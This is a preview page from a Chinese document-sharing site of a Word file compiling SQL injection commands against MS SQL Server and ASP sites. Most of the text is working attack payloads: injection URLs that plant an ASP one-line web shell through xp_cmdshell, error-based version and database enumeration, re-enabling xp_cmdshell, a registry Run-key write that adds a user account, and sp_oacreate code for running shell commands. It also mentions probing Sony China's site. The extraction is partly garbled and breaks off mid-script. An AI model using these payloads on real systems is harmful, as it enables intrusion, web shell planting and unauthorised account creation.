2022年最详细的SQL注入相关的命令整理.docx

上传人：l****

文档编号：81147763

上传时间：2023-03-24

格式：DOCX

页数：5

大小：12.88KB

( 4.5 )

《2022年最详细的SQL注入相关的命令整理.docx》由会员分享，可在线阅读，更多相关《2022年最详细的SQL注入相关的命令整理.docx（5页珍藏版）》请在淘文阁 - 分享文档赚钱的网站上搜索。

1、2022年最详细的SQL注入相关的命令整理1、用转义字符来写ASP(一句话木马)文件的方法:? http:/192.168.1.5/display.asp?keyno=1881;exec master.dbo.xp_cmdshell echo <script language=VBScript runat=server>execute request(l)</script> >c:mu.asp;-? echo <%execute(request(l)%> >c:mu.asp2、显示SQL系统版本：? http:/192.168.1.5/dis

2、play.asp?keyno=188 and 1=(select VERSION)? and 1=convert(int,version)-Microsoft VBScript 编译器错误错误 800a03f6缺少 End/iisHelp/common/500-100.asp，行242Microsoft OLE DB Provider for ODBC Drivers 错误 80040e07MicrosoftODBC SQL Server DriverSQL ServerSyntax error converting the nvarchar value Microsoft SQL Serv

3、er 2000 - 8.00.760 (Intel X86) Dec 17 2022 14:22:05 Copyright (c) 1988-2022 Microsoft Corporation Desktop Engine on Windows NT 5.0 (Build 2195: Service Pack 4) to a column of data type int./display.asp，行173、在检测索尼中国的网站漏洞时，分明已经确定了漏洞存在却无法在这三种漏洞中找到对应的类型。偶然间我想到了在SQL语言中可以运用in关键字进行查询，例如select * from mytabl

4、e where id in(1)，括号中的值就是我们提交的数据，它的结果与运用select * from mytable where id=1的查询结果完全相同。所以访问页面的时候在URL后面加上) and 1=1 and 1 in(1后原来的SQL语句就变成了select * from mytable where id in(1) and 1=1 and 1 in(1)，这样就会出现期盼已久的页面了。暂且就叫这种类型的漏洞为包含数字型吧，聪慧的你肯定想到了还有包含字符型呢。对了，它就是由于类似select * from mytable where name in(firstsee)的查询语句

5、造成的。4、推断xp_cmdshell扩展存储过程是否存在：http:/192.168.1.5/display.asp?keyno=188 and 1=(select count(*) FROM master.dbo.sysobjects where xtype = X AND name = xp_cmdshell)复原xp_cmdshell扩展存储的吩咐：;exec master.dbo.sp_addextendedproc xp_cmdshell,e:inetputwebxplog70.dll;-5、向启动组中写入吩咐行和执行程序：http:/192.168.1.5/display.a

6、sp?keyno=188;EXEC master.dbo.xp_regwrite HKEY_LOCAL_MACHINE,SOFTWAREMicrosoftWindowsCurrentVersionRun,help1,REG_SZ,cmd.exe /c net user test ptlove /add6、查看当前的数据库名称：? http:/192.168.1.5/display.asp?keyno=188 and 0<>db_name(n) n改成0,1,2,3就可以跨库了? and 1=convert(int,db_name()-Microsoft VBScript 编译器错

7、误错误 800a03f6缺少 End/iisHelp/common/500-100.asp，行242Microsoft OLE DB Provider for ODBC Drivers 错误 80040e07MicrosoftODBC SQL Server DriverSQL ServerSyntax error converting the nvarchar value huidahouse to a column of data type int./display.asp，行177、列出当前全部的数据库名称：select * from master.dbo.sysdatabases 列

8、出全部列的记录select name from master.dbo.sysdatabases 仅列出name列的记录8、不需xp_cmdshell支持在有注入漏洞的SQL服务器上运行CMD吩咐：create TABLE mytmp(info VARCHAR(400),ID int IDENTITY(1,1) NOT NULL)DECLARE shell INTDECLARE fso INTDECLARE file INTDECLARE isEnd BITDECLARE out VARCHAR(400)EXEC sp_oacreate wscript.shell,shell outputEX

9、EC sp_oamethod shell,run,null,cmd.exe /c dir c:>c:temp.txt,0,true-留意run的参数true指的是将等待程序运行的结果，对于类似ping的长时间吩咐必需运用此参数。EXEC sp_oacreate scripting.filesystemobject,fso outputEXEC sp_oamethod fso,opentextfile,file out,c:temp.txt-因为fso的opentextfile方法将返回一个textstream对象，所以此时file是一个对象令牌WHILE shell>0BEGINEXEC sp_oamethod file,Readline,out outinsert INTO MYTMP(info) VALUES (out)EXEC sp_oagetproperty file,AtEndOfStream,isEnd outIF isEnd=1 BREAKELSE CONTINUEENDdrop TABLE MYTMP-DECLARE shell INTDECLARE fso INTDECLARE file INT1234567891011下一页

文档加载中……请稍候！
如果长时间未打开，您也可以点击刷新试试。

下载文档到电脑，查找使用更方便

9.9 金币

版权申诉 word格式文档无特别注明外均可编辑修改；预览文档经过压缩，下载后原文更清晰！ 立即下载

配套讲稿：: 如PPT文件的首页显示word图标，表示该PPT已包含配套word讲稿。双击word图标可打开word文档。
特殊限制：: 部分文档作品中含有的国旗、国徽等图片，仅作为作品整体效果示例展示，禁止商用。设计者仅对作品中独创性部分享有著作权。
关键词：: 2022 详细 SQL 注入相关命令整理

淘文阁 - 分享文档赚钱的网站所有资源均是用户自行上传分享，仅供网友学习交流，未经上传用户书面授权，请勿作他用。

限制150内

关于本文

本文标题：2022年最详细的SQL注入相关的命令整理.docx
链接地址：https://www.taowenge.com/p-81147763.html